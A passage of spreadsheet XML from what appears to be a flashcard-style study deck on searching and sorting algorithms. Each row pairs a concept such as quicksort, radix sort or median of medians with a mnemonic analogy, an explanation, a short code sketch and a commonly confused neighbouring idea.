          <t># Koko bananas: search speed k in [1, max(pile)] / # feasible(k) = hours(k) &lt;= H, monotonic in k / # answer = smallest k with feasible(k) True</t>
        </is>
      </c>
      <c r="G217" t="inlineStr">
        <is>
          <t>Binary search on index - here the halved axis is the space of candidate ANSWERS, not positions in stored data.</t>
        </is>
      </c>
      <c r="H217" t="inlineStr">
        <is>
          <t>Price Is Right bidding with only higher/lower feedback.</t>
        </is>
      </c>
      <c r="J217" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K217" t="inlineStr">
        <is>
          <t>Searching</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" t="n">
        <v>0</v>
      </c>
      <c r="B218" t="inlineStr">
        <is>
          <t>216</t>
        </is>
      </c>
      <c r="C218" t="inlineStr">
        <is>
          <t>Rotated array search</t>
        </is>
      </c>
      <c r="D218" t="inlineStr">
        <is>
          <t>A clock face someone spun so it reads 7,8,9,...,6: slice it anywhere and one arc still reads in order. Trust the orderly arc to navigate.</t>
        </is>
      </c>
      <c r="E218" t="inlineStr">
        <is>
          <t>A sorted array rotated at a pivot still has one sorted half at every mid; identify it, test whether the target lies inside, recurse into the right piece.</t>
        </is>
      </c>
      <c r="F218" t="inlineStr">
        <is>
          <t>if a[lo] &lt;= a[m]: # left half sorted / if a[lo] &lt;= t &lt; a[m]: hi = m - 1 / else: lo = m + 1</t>
        </is>
      </c>
      <c r="G218" t="inlineStr">
        <is>
          <t>Finding the rotation point (minimum) - a separate binary search; with duplicates the worst case degrades to O(n).</t>
        </is>
      </c>
      <c r="H218" t="inlineStr">
        <is>
          <t>A conga line that wrapped around a pillar mid-song.</t>
        </is>
      </c>
      <c r="J218" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K218" t="inlineStr">
        <is>
          <t>Searching</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" t="n">
        <v>0</v>
      </c>
      <c r="B219" t="inlineStr">
        <is>
          <t>217</t>
        </is>
      </c>
      <c r="C219" t="inlineStr">
        <is>
          <t>Two pointers</t>
        </is>
      </c>
      <c r="D219" t="inlineStr">
        <is>
          <t>Two workers rolling up a huge carpet from opposite ends; whichever roll is too light rolls further inward, until they meet exactly over the lost ring.</t>
        </is>
      </c>
      <c r="E219" t="inlineStr">
        <is>
          <t>Two indices sweep the data - from both ends or at different speeds - shrinking the search space each step; turns many O(n^2) pair scans into O(n).</t>
        </is>
      </c>
      <c r="F219" t="inlineStr">
        <is>
          <t>l, r = 0, len(a) - 1 # a sorted / if a[l] + a[r] &lt; k: l += 1 / elif a[l] + a[r] &gt; k: r -= 1 # else: found pair</t>
        </is>
      </c>
      <c r="G219" t="inlineStr">
        <is>
          <t>Sliding window - a window is two pointers moving the SAME direction bounding a contiguous range; classic two pointers converge from the ends.</t>
        </is>
      </c>
      <c r="H219" t="inlineStr">
        <is>
          <t>Tortoise-and-hare fast/slow pointers for cycle finding.</t>
        </is>
      </c>
      <c r="J219" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K219" t="inlineStr">
        <is>
          <t>Searching</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" t="n">
        <v>0</v>
      </c>
      <c r="B220" t="inlineStr">
        <is>
          <t>218</t>
        </is>
      </c>
      <c r="C220" t="inlineStr">
        <is>
          <t>Sliding window</t>
        </is>
      </c>
      <c r="D220" t="inlineStr">
        <is>
          <t>A train window gliding along a graffiti wall: new art enters on the right, old scenery exits left, and you keep a running tally without ever looking back.</t>
        </is>
      </c>
      <c r="E220" t="inlineStr">
        <is>
          <t>Keep a contiguous [left, right] range over a sequence: advance right to grow, advance left to restore validity; each element enters and leaves once - O(n).</t>
        </is>
      </c>
      <c r="F220" t="inlineStr">
        <is>
          <t>for r, x in enumerate(a): / s += x / while s &gt; k: s -= a[l]; l += 1</t>
        </is>
      </c>
      <c r="G220" t="inlineStr">
        <is>
          <t>Fixed-size window - the subcase where left moves in lockstep with right; variable windows move left only when a constraint breaks.</t>
        </is>
      </c>
      <c r="H220" t="inlineStr">
        <is>
          <t>A caterpillar inching: head stretches forward, tail catches up.</t>
        </is>
      </c>
      <c r="J220" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K220" t="inlineStr">
        <is>
          <t>Searching</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" t="n">
        <v>0</v>
      </c>
      <c r="B221" t="inlineStr">
        <is>
          <t>219</t>
        </is>
      </c>
      <c r="C221" t="inlineStr">
        <is>
          <t>Exponential (galloping) search</t>
        </is>
      </c>
      <c r="D221" t="inlineStr">
        <is>
          <t>A kangaroo hunting a fence post in the dark: hops of doubling length until it sails past the post, then hops back in halves to land on it exactly.</t>
        </is>
      </c>
      <c r="E221" t="inlineStr">
        <is>
          <t>Probe positions 1, 2, 4, 8, ... until you overshoot the target, then binary search inside the last bracket; O(log i) for target position i, works unbounded.</t>
        </is>
      </c>
      <c r="F221" t="inlineStr">
        <is>
          <t>i = 1 / while i &lt; n and a[i] &lt; t: i *= 2 / binary_search(a, t, i // 2, min(i, n - 1))</t>
        </is>
      </c>
      <c r="G221" t="inlineStr">
        <is>
          <t>Binary search - needs a known length; galloping first FINDS the bracket, ideal for infinite streams (and Timsort's merges).</t>
        </is>
      </c>
      <c r="H221" t="inlineStr">
        <is>
          <t>Zeno's runner reversed: doubling strides out, halving strides back.</t>
        </is>
      </c>
      <c r="J221" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K221" t="inlineStr">
        <is>
          <t>Searching</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" t="n">
        <v>0</v>
      </c>
      <c r="B222" t="inlineStr">
        <is>
          <t>220</t>
        </is>
      </c>
      <c r="C222" t="inlineStr">
        <is>
          <t>Insertion sort</t>
        </is>
      </c>
      <c r="D222" t="inlineStr">
        <is>
          <t>A card player picking up a poker hand one card at a time, sliding each new card leftward between the fanned cards until it clicks into its slot.</t>
        </is>
      </c>
      <c r="E222" t="inlineStr">
        <is>
          <t>Grow a sorted prefix by taking the next element and shifting it left into place; O(n^2) worst but O(n) on nearly sorted data - great for tiny arrays.</t>
        </is>
      </c>
      <c r="F222" t="inlineStr">
        <is>
          <t>for i in range(1, n): / j = i / while j &gt; 0 and a[j-1] &gt; a[j]: a[j-1], a[j] = a[j], a[j-1]; j -= 1</t>
        </is>
      </c>
      <c r="G222" t="inlineStr">
        <is>
          <t>Selection sort - insertion pushes the NEW element into a sorted prefix; selection pulls the MINIMUM out of the unsorted suffix.</t>
        </is>
      </c>
      <c r="H222" t="inlineStr">
        <is>
          <t>A librarian slotting one returned book into an already-sorted shelf.</t>
        </is>
      </c>
      <c r="J222" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K222" t="inlineStr">
        <is>
          <t>Sorting: comparison</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" t="n">
        <v>0</v>
      </c>
      <c r="B223" t="inlineStr">
        <is>
          <t>221</t>
        </is>
      </c>
      <c r="C223" t="inlineStr">
        <is>
          <t>Selection sort</t>
        </is>
      </c>
      <c r="D223" t="inlineStr">
        <is>
          <t>A talent scout who re-watches the ENTIRE audition line every round just to crown one winner, walks them to the front row, then re-watches everyone again.</t>
        </is>
      </c>
      <c r="E223" t="inlineStr">
        <is>
          <t>Repeatedly scan the unsorted suffix for its minimum and swap it to the front; always Theta(n^2) comparisons but only n-1 swaps.</t>
        </is>
      </c>
      <c r="F223" t="inlineStr">
        <is>
          <t>for i in range(n): / m = min(range(i, n), key=a.__getitem__) / a[i], a[m] = a[m], a[i]</t>
        </is>
      </c>
      <c r="G223" t="inlineStr">
        <is>
          <t>Insertion sort - adaptive and fast on nearly sorted input; selection always does full scans but minimizes writes (good for costly writes).</t>
        </is>
      </c>
      <c r="H223" t="inlineStr">
        <is>
          <t>Podium ceremony: find gold, seat them, repeat for silver.</t>
        </is>
      </c>
      <c r="J223" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K223" t="inlineStr">
        <is>
          <t>Sorting: comparison</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" t="n">
        <v>0</v>
      </c>
      <c r="B224" t="inlineStr">
        <is>
          <t>222</t>
        </is>
      </c>
      <c r="C224" t="inlineStr">
        <is>
          <t>Bubble sort</t>
        </is>
      </c>
      <c r="D224" t="inlineStr">
        <is>
          <t>Fizzy soda: the biggest bubble wobbles past its neighbors one nudge at a time until it pops at the surface; each sweep floats the next-biggest up.</t>
        </is>
      </c>
      <c r="E224" t="inlineStr">
        <is>
          <t>Sweep adjacent pairs, swapping any out-of-order neighbors; the largest value bubbles to the end each pass; O(n^2), O(n) if a pass makes no swaps.</t>
        </is>
      </c>
      <c r="F224" t="inlineStr">
        <is>
          <t>for i in range(n): / for j in range(n - 1 - i): / if a[j] &gt; a[j+1]: a[j], a[j+1] = a[j+1], a[j]</t>
        </is>
      </c>
      <c r="G224" t="inlineStr">
        <is>
          <t>Insertion sort - both O(n^2) and adaptive, but bubble swaps neighbors every pass while insertion shifts each element once; bubble is rarely the right pick.</t>
        </is>
      </c>
      <c r="H224" t="inlineStr">
        <is>
          <t>Kids sorting themselves by height via neighbor swaps.</t>
        </is>
      </c>
      <c r="J224" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K224" t="inlineStr">
        <is>
          <t>Sorting: comparison</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" t="n">
        <v>0</v>
      </c>
      <c r="B225" t="inlineStr">
        <is>
          <t>223</t>
        </is>
      </c>
      <c r="C225" t="inlineStr">
        <is>
          <t>Mergesort</t>
        </is>
      </c>
      <c r="D225" t="inlineStr">
        <is>
          <t>Two librarians each sort half the returned books, then walk toward each other zipper-merging their carts, always placing the smaller spine next.</t>
        </is>
      </c>
      <c r="E225" t="inlineStr">
        <is>
          <t>Split in half, sort each half recursively, then merge the two sorted runs with a two-finger sweep; guaranteed Theta(n log n), stable, O(n) extra space.</t>
        </is>
      </c>
      <c r="F225" t="inlineStr">
        <is>
          <t>L, R = msort(a[:n//2]), msort(a[n//2:]) / # merge: repeatedly take the smaller head of L or R</t>
        </is>
      </c>
      <c r="G225" t="inlineStr">
        <is>
          <t>Quicksort - quicksort works while SPLITTING (partition), mergesort while JOINING (merge); mergesort guarantees n log n but needs an O(n) buffer.</t>
        </is>
      </c>
      <c r="H225" t="inlineStr">
        <is>
          <t>Zipper teeth interleaving two sorted rows.</t>
        </is>
      </c>
      <c r="J225" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K225" t="inlineStr">
        <is>
          <t>Sorting: comparison</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" t="n">
        <v>0</v>
      </c>
      <c r="B226" t="inlineStr">
        <is>
          <t>224</t>
        </is>
      </c>
      <c r="C226" t="inlineStr">
        <is>
          <t>Quicksort</t>
        </is>
      </c>
      <c r="D226" t="inlineStr">
        <is>
          <t>A drill sergeant (the pivot) plants a flag and bellows 'shorter than me, LEFT! taller, RIGHT!' - then a new sergeant inside each mob repeats the drill.</t>
        </is>
      </c>
      <c r="E226" t="inlineStr">
        <is>
          <t>Pick a pivot, partition smaller elements left and larger right, recurse on both sides; average n log n in-place, worst n^2 on bad pivots.</t>
        </is>
      </c>
      <c r="F226" t="inlineStr">
        <is>
          <t>p = a[random.randrange(len(a))] / return qs([x for x in a if x &lt; p]) + [x for x in a if x == p] + qs([x for x in a if x &gt; p])</t>
        </is>
      </c>
      <c r="G226" t="inlineStr">
        <is>
          <t>Mergesort - mergesort splits trivially and merges smart; quicksort splits smart (partition) and combines by mere concatenation.</t>
        </is>
      </c>
      <c r="H226" t="inlineStr">
        <is>
          <t>A bouncer sorting the queue against a height mark on the wall.</t>
        </is>
      </c>
      <c r="J226" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K226" t="inlineStr">
        <is>
          <t>Sorting: comparison</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" t="n">
        <v>0</v>
      </c>
      <c r="B227" t="inlineStr">
        <is>
          <t>225</t>
        </is>
      </c>
      <c r="C227" t="inlineStr">
        <is>
          <t>Quicksort pivot selection</t>
        </is>
      </c>
      <c r="D227" t="inlineStr">
        <is>
          <t>Dodgeball captain who always picks the first kid in line - rivals stack the line against him and he loses every game. Drawing names from a hat ruins their sabotage.</t>
        </is>
      </c>
      <c r="E227" t="inlineStr">
        <is>
          <t>Quicksort's fate hangs on the pivot: sorted input with a first-element pivot hits O(n^2); random or median-of-three pivots make bad splits vanishingly rare.</t>
        </is>
      </c>
      <c r="F227" t="inlineStr">
        <is>
          <t>p = a[(lo + hi) // 2] # or median of a[lo], a[mid], a[hi] / p = a[random.randrange(lo, hi + 1)]</t>
        </is>
      </c>
      <c r="G227" t="inlineStr">
        <is>
          <t>Quickselect pivots - same trick; there median-of-medians buys guaranteed O(n), while sorting's safety net is randomization or introsort's heap fallback.</t>
        </is>
      </c>
      <c r="H227" t="inlineStr">
        <is>
          <t>Adversarial 'killer' inputs that murder any fixed pivot rule.</t>
        </is>
      </c>
      <c r="J227" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K227" t="inlineStr">
        <is>
          <t>Sorting: comparison</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" t="n">
        <v>0</v>
      </c>
      <c r="B228" t="inlineStr">
        <is>
          <t>226</t>
        </is>
      </c>
      <c r="C228" t="inlineStr">
        <is>
          <t>Sort stability</t>
        </is>
      </c>
      <c r="D228" t="inlineStr">
        <is>
          <t>A stable horse barn: two horses both named Bay trot out the gate in exactly the order they trotted in. The unstable barn next door shuffles the twins nightly.</t>
        </is>
      </c>
      <c r="E228" t="inlineStr">
        <is>
          <t>A stable sort keeps equal keys in original relative order, so chained sorts build multi-key orderings; mergesort/Timsort stable, quicksort/heapsort not.</t>
        </is>
      </c>
      <c r="F228" t="inlineStr">
        <is>
          <t>rows.sort(key=lambda r: r.date) / rows.sort(key=lambda r: r.city) # stable: within city, still by date</t>
        </is>
      </c>
      <c r="G228" t="inlineStr">
        <is>
          <t>In-place - an orthogonal property about memory, not equal-key order; a sort can be either, both, or neither.</t>
        </is>
      </c>
      <c r="H228" t="inlineStr">
        <is>
          <t>Deli counter: same-priority customers served in ticket order.</t>
        </is>
      </c>
      <c r="J228" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K228" t="inlineStr">
        <is>
          <t>Sorting: comparison</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" t="n">
        <v>0</v>
      </c>
      <c r="B229" t="inlineStr">
        <is>
          <t>227</t>
        </is>
      </c>
      <c r="C229" t="inlineStr">
        <is>
          <t>Comparison sort lower bound</t>
        </is>
      </c>
      <c r="D229" t="inlineStr">
        <is>
          <t>Twenty Questions against n! suspects: each yes/no question splits the suspect pool in half at best, so no interrogator beats log2(n!) questions.</t>
        </is>
      </c>
      <c r="E229" t="inlineStr">
        <is>
          <t>Any sort that only compares pairs needs Omega(n log n) comparisons: n! orderings form a decision tree of depth at least log2(n!) ~ n log n.</t>
        </is>
      </c>
      <c r="F229" t="inlineStr">
        <is>
          <t>log2(n!) &gt;= (n/2) * log2(n/2) / # so ~n log n comparisons are unavoidable</t>
        </is>
      </c>
      <c r="G229" t="inlineStr">
        <is>
          <t>Counting/radix 'beating' the bound - no contradiction: they never compare pairs, they read key digits, a different computation model.</t>
        </is>
      </c>
      <c r="H229" t="inlineStr">
        <is>
          <t>Balance-scale coin puzzles: 3 weighings distinguish at most 27 cases.</t>
        </is>
      </c>
      <c r="J229" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K229" t="inlineStr">
        <is>
          <t>Sorting: comparison</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" t="n">
        <v>0</v>
      </c>
      <c r="B230" t="inlineStr">
        <is>
          <t>228</t>
        </is>
      </c>
      <c r="C230" t="inlineStr">
        <is>
          <t>Timsort</t>
        </is>
      </c>
      <c r="D230" t="inlineStr">
        <is>
          <t>Tim the tailor sews a quilt from strips people already hemmed: he keeps every ready-made run intact, stitches strips together, and gallops his needle across long matching stretches.</t>
        </is>
      </c>
      <c r="E230" t="inlineStr">
        <is>
          <t>Python and Java's adaptive mergesort: find natural sorted runs, extend short ones with insertion sort, merge runs with galloping; O(n) on sorted input.</t>
        </is>
      </c>
      <c r="F230" t="inlineStr">
        <is>
          <t>sorted(data) # Timsort under the hood / # already-sorted input: one run detected, O(n)</t>
        </is>
      </c>
      <c r="G230" t="inlineStr">
        <is>
          <t>Plain mergesort - splits blindly; Timsort exploits existing runs and switches to insertion sort below ~32 elements.</t>
        </is>
      </c>
      <c r="H230" t="inlineStr">
        <is>
          <t>Named for Tim Peters, surfing waves the data already made.</t>
        </is>
      </c>
      <c r="J230" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K230" t="inlineStr">
        <is>
          <t>Sorting: comparison</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" t="n">
        <v>0</v>
      </c>
      <c r="B231" t="inlineStr">
        <is>
          <t>229</t>
        </is>
      </c>
      <c r="C231" t="inlineStr">
        <is>
          <t>Heapsort</t>
        </is>
      </c>
      <c r="D231" t="inlineStr">
        <is>
          <t>A cheerleader pyramid where the tallest always surfaces on top, gets plucked off to the end of a line, and the pyramid rebuilds itself - again and again until the line is everyone.</t>
        </is>
      </c>
      <c r="E231" t="inlineStr">
        <is>
          <t>Build a max-heap in O(n), then repeatedly swap the root to the end and sift down; in-place Theta(n log n) worst case, but unstable and cache-unfriendly.</t>
        </is>
      </c>
      <c r="F231" t="inlineStr">
        <is>
          <t>heapify(a) # O(n) / for end in range(n - 1, 0, -1): / a[0], a[end] = a[end], a[0]; sift_down(a, 0, end)</t>
        </is>
      </c>
      <c r="G231" t="inlineStr">
        <is>
          <t>Quicksort - heapsort guarantees n log n in-place (introsort's safety net) but loses on constants and cache locality, so quicksort usually wins in practice.</t>
        </is>
      </c>
      <c r="H231" t="inlineStr">
        <is>
          <t>King-of-the-hill tournament; dethroned kings retire to the back row.</t>
        </is>
      </c>
      <c r="J231" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K231" t="inlineStr">
        <is>
          <t>Sorting: comparison</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" t="n">
        <v>0</v>
      </c>
      <c r="B232" t="inlineStr">
        <is>
          <t>230</t>
        </is>
      </c>
      <c r="C232" t="inlineStr">
        <is>
          <t>Counting sort</t>
        </is>
      </c>
      <c r="D232" t="inlineStr">
        <is>
          <t>A mail room with 100 numbered pigeonholes: nobody compares letters - each drops straight into its numbered hole, then you walk the wall left to right scooping them out in order.</t>
        </is>
      </c>
      <c r="E232" t="inlineStr">
        <is>
          <t>For integer keys in a small range k: tally occurrences into a count array, prefix-sum to positions, place items; O(n + k), stable, zero comparisons.</t>
        </is>
      </c>
      <c r="F232" t="inlineStr">
        <is>
          <t>cnt = [0] * (k + 1) / for x in a: cnt[x] += 1 / out = [v for v in range(k + 1) for _ in range(cnt[v])]</t>
        </is>
      </c>
      <c r="G232" t="inlineStr">
        <is>
          <t>Bucket sort - buckets hold value RANGES and need inner sorting; counting sort's slots hold exact key values, no inner sort.</t>
        </is>
      </c>
      <c r="H232" t="inlineStr">
        <is>
          <t>Election tally marks under each candidate's name.</t>
        </is>
      </c>
      <c r="J232" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K232" t="inlineStr">
        <is>
          <t>Sorting: non-comparison &amp; external</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" t="n">
        <v>0</v>
      </c>
      <c r="B233" t="inlineStr">
        <is>
          <t>231</t>
        </is>
      </c>
      <c r="C233" t="inlineStr">
        <is>
          <t>Radix sort</t>
        </is>
      </c>
      <c r="D233" t="inlineStr">
        <is>
          <t>An old punch-card sorting machine: run the whole deck through once per column, LAST column first; each stable pass carefully preserves the order the previous pass built.</t>
        </is>
      </c>
      <c r="E233" t="inlineStr">
        <is>
          <t>Sort fixed-width keys digit by digit with one stable pass per digit, least significant first (LSD); O(d*(n+k)) - linear when digits are few.</t>
        </is>
      </c>
      <c r="F233" t="inlineStr">
        <is>
          <t>for d in range(digits): # LSD first / a = stable_counting_sort_by_digit(a, d)</t>
        </is>
      </c>
      <c r="G233" t="inlineStr">
        <is>
          <t>Counting sort - radix repeatedly APPLIES a stable counting sort per digit; counting alone dies when the key range k is huge.</t>
        </is>
      </c>
      <c r="H233" t="inlineStr">
        <is>
          <t>Sorting library call numbers by rightmost character first.</t>
        </is>
      </c>
      <c r="J233" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K233" t="inlineStr">
        <is>
          <t>Sorting: non-comparison &amp; external</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" t="n">
        <v>0</v>
      </c>
      <c r="B234" t="inlineStr">
        <is>
          <t>232</t>
        </is>
      </c>
      <c r="C234" t="inlineStr">
        <is>
          <t>Bucket sort</t>
        </is>
      </c>
      <c r="D234" t="inlineStr">
        <is>
          <t>Sorting a rainbow mountain of Lego by hurling pieces into color bins across the room, then quickly tidying each bin - glorious until every single piece turns out to be red.</t>
        </is>
      </c>
      <c r="E234" t="inlineStr">
        <is>
          <t>Scatter items into m buckets by value range, sort each small bucket (insertion sort), concatenate; average O(n) when input is uniformly spread.</t>
        </is>
      </c>
      <c r="F234" t="inlineStr">
        <is>
          <t>b = [[] for _ in range(m)] / for x in a: b[int(x * m)].append(x) # x in [0,1) / out = [y for bk in b for y in sorted(bk)]</t>
        </is>
      </c>
      <c r="G234" t="inlineStr">
        <is>
          <t>Counting sort - needs discrete keys with exact slots; bucket handles continuous values but leans on a uniform distribution for O(n).</t>
        </is>
      </c>
      <c r="H234" t="inlineStr">
        <is>
          <t>Post office flinging mail into regional sacks by zip prefix.</t>
        </is>
      </c>
      <c r="J234" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K234" t="inlineStr">
        <is>
          <t>Sorting: non-comparison &amp; external</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" t="n">
        <v>0</v>
      </c>
      <c r="B235" t="inlineStr">
        <is>
          <t>233</t>
        </is>
      </c>
      <c r="C235" t="inlineStr">
        <is>
          <t>Bounded-keys assumption</t>
        </is>
      </c>
      <c r="D235" t="inlineStr">
        <is>
          <t>A magician who reads envelopes without opening them - but only when each is postmarked with a number under 1000. Hand him unmarked envelopes and he's back to comparing pairs like everyone else.</t>
        </is>
      </c>
      <c r="E235" t="inlineStr">
        <is>
          <t>Linear-time sorts dodge the n log n bound only because keys expose structure - small integer range or fixed digits; arbitrary comparables get no shortcut.</t>
        </is>
      </c>
      <c r="F235" t="inlineStr">
        <is>
          <t>ages 0..120: counting sort shines / arbitrary floats/objects: must compare, Omega(n log n)</t>
        </is>
      </c>
      <c r="G235" t="inlineStr">
        <is>
          <t>The lower bound 'violated' - it never is: Omega(n log n) binds comparison sorts only; digit inspection is a different model of computation.</t>
        </is>
      </c>
      <c r="H235" t="inlineStr">
        <is>
          <t>A cheat code that only works on levels 1 through 99.</t>
        </is>
      </c>
      <c r="J235" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K235" t="inlineStr">
        <is>
          <t>Sorting: non-comparison &amp; external</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" t="n">
        <v>0</v>
      </c>
      <c r="B236" t="inlineStr">
        <is>
          <t>234</t>
        </is>
      </c>
      <c r="C236" t="inlineStr">
        <is>
          <t>External merge sort</t>
        </is>
      </c>
      <c r="D236" t="inlineStr">
        <is>
          <t>Moving a mountain of paperwork with one small desk: sort a desk-load at a time into neat folders on the floor, then merge folders by always grabbing the smallest top page.</t>
        </is>
      </c>
      <c r="E236" t="inlineStr">
        <is>
          <t>Sort data too big for RAM: read chunks that fit, sort each, spill sorted runs to disk, then k-way merge the runs as streams; disk passes dominate cost.</t>
        </is>
      </c>
      <c r="F236" t="inlineStr">
        <is>
          <t>runs = sort each RAM-sized chunk, write to disk / heapq.merge(*runs) # stream the final order</t>
        </is>
      </c>
      <c r="G236" t="inlineStr">
        <is>
          <t>In-memory mergesort - same merge idea, but external sort is priced in disk I/O passes, not comparisons; run count and fan-in drive the cost.</t>
        </is>
      </c>
      <c r="H236" t="inlineStr">
        <is>
          <t>Freight yard: sort one wagon at a time, then interleave trains.</t>
        </is>
      </c>
      <c r="J236" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K236" t="inlineStr">
        <is>
          <t>Sorting: non-comparison &amp; external</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" t="n">
        <v>0</v>
      </c>
      <c r="B237" t="inlineStr">
        <is>
          <t>235</t>
        </is>
      </c>
      <c r="C237" t="inlineStr">
        <is>
          <t>K-way merge</t>
        </is>
      </c>
      <c r="D237" t="inlineStr">
        <is>
          <t>K checkout lanes each ordered by receipt number; one dispatcher watches only the FRONT customer of every lane and always waves through the lowest number.</t>
        </is>
      </c>
      <c r="E237" t="inlineStr">
        <is>
          <t>Merge k sorted streams by keeping each stream's head in a min-heap: pop the smallest, push its successor; O(N log k) for N total items.</t>
        </is>
      </c>
      <c r="F237" t="inlineStr">
        <is>
          <t>import heapq / for x in heapq.merge(run1, run2, run3): / out.write(x)</t>
        </is>
      </c>
      <c r="G237" t="inlineStr">
        <is>
          <t>Two-way merge - with k=2 a heap is pointless overhead; the log k heap cost only earns its keep for k &gt; 2.</t>
        </is>
      </c>
      <c r="H237" t="inlineStr">
        <is>
          <t>A conductor cueing whichever orchestra section's next note comes first.</t>
        </is>
      </c>
      <c r="J237" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K237" t="inlineStr">
        <is>
          <t>Sorting: non-comparison &amp; external</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" t="n">
        <v>0</v>
      </c>
      <c r="B238" t="inlineStr">
        <is>
          <t>236</t>
        </is>
      </c>
      <c r="C238" t="inlineStr">
        <is>
          <t>Quickselect</t>
        </is>
      </c>
      <c r="D238" t="inlineStr">
        <is>
          <t>An official hunting the 3rd-shortest kid: after each lineup split he dismisses the ENTIRE irrelevant crowd and re-splits only the group holding position 3.</t>
        </is>
      </c>
      <c r="E238" t="inlineStr">
        <is>
          <t>Find the k-th smallest without fully sorting: partition like quicksort but recurse only into the side containing index k; average O(n), worst O(n^2).</t>
        </is>
      </c>
      <c r="F238" t="inlineStr">
        <is>
          <t>p = partition(a, lo, hi) / if p == k: return a[p] / recurse into left if k &lt; p else right</t>
        </is>
      </c>
      <c r="G238" t="inlineStr">
        <is>
          <t>Quicksort - recurses on BOTH sides for n log n; quickselect discards one side each round, collapsing the sum to average O(n).</t>
        </is>
      </c>
      <c r="H238" t="inlineStr">
        <is>
          <t>A tournament where you only replay the half of the bracket holding your seed.</t>
        </is>
      </c>
      <c r="J238" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K238" t="inlineStr">
        <is>
          <t>Sorting: non-comparison &amp; external</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" t="n">
        <v>0</v>
      </c>
      <c r="B239" t="inlineStr">
        <is>
          <t>237</t>
        </is>
      </c>
      <c r="C239" t="inlineStr">
        <is>
          <t>Median of medians</t>
        </is>
      </c>
      <c r="D239" t="inlineStr">
        <is>
          <t>Electing a president of class presidents: every 5-student row picks its middle-height kid, and those kids line up and pick THEIR middle - a pivot no adversary can rig.</t>
        </is>
      </c>
      <c r="E239" t="inlineStr">
        <is>
          <t>Deterministic pivot for selection: split into groups of 5, take each group's median, recursively select the median of those medians - worst-case O(n).</t>
        </is>
      </c>
      <c r="F239" t="inlineStr">
        <is>
          <t>groups = [sorted(a[i:i+5]) for i in range(0, n, 5)] / med = select([g[len(g)//2] for g in groups]) / # pivot guarantees at least a 30/70 split</t>
        </is>
      </c>
      <c r="G239" t="inlineStr">
        <is>
          <t>Random-pivot quickselect - expected O(n) and faster in practice; median-of-medians pays bigger constants for a worst-case guarantee.</t>
        </is>
      </c>
      <c r="H239" t="inlineStr">
        <is>
          <t>BFPRT: the five-author algorithm built on groups of five.</t>
        </is>
      </c>
      <c r="J239" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K239" t="inlineStr">
        <is>
          <t>Sorting: non-comparison &amp; external</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" t="n">
        <v>0</v>
      </c>
      <c r="B240" t="inlineStr">
        <is>
          <t>238</t>
        </is>
      </c>
      <c r="C240" t="inlineStr">
        <is>
          <t>Top-k via heap</t>
        </is>
      </c>
      <c r="D240" t="inlineStr">
        <is>
          <t>A tiny trophy shelf holding exactly k trophies: each newcomer must outshine the dullest trophy, which gets knocked off the edge; the shelf itself never grows.</t>
        </is>
      </c>
      <c r="E240" t="inlineStr">
        <is>
          <t>Keep the k best items in a size-k heap that evicts the weakest; stream all n items through in O(n log k) - no need to sort everything.</t>
        </is>
      </c>
      <c r="F240" t="inlineStr">
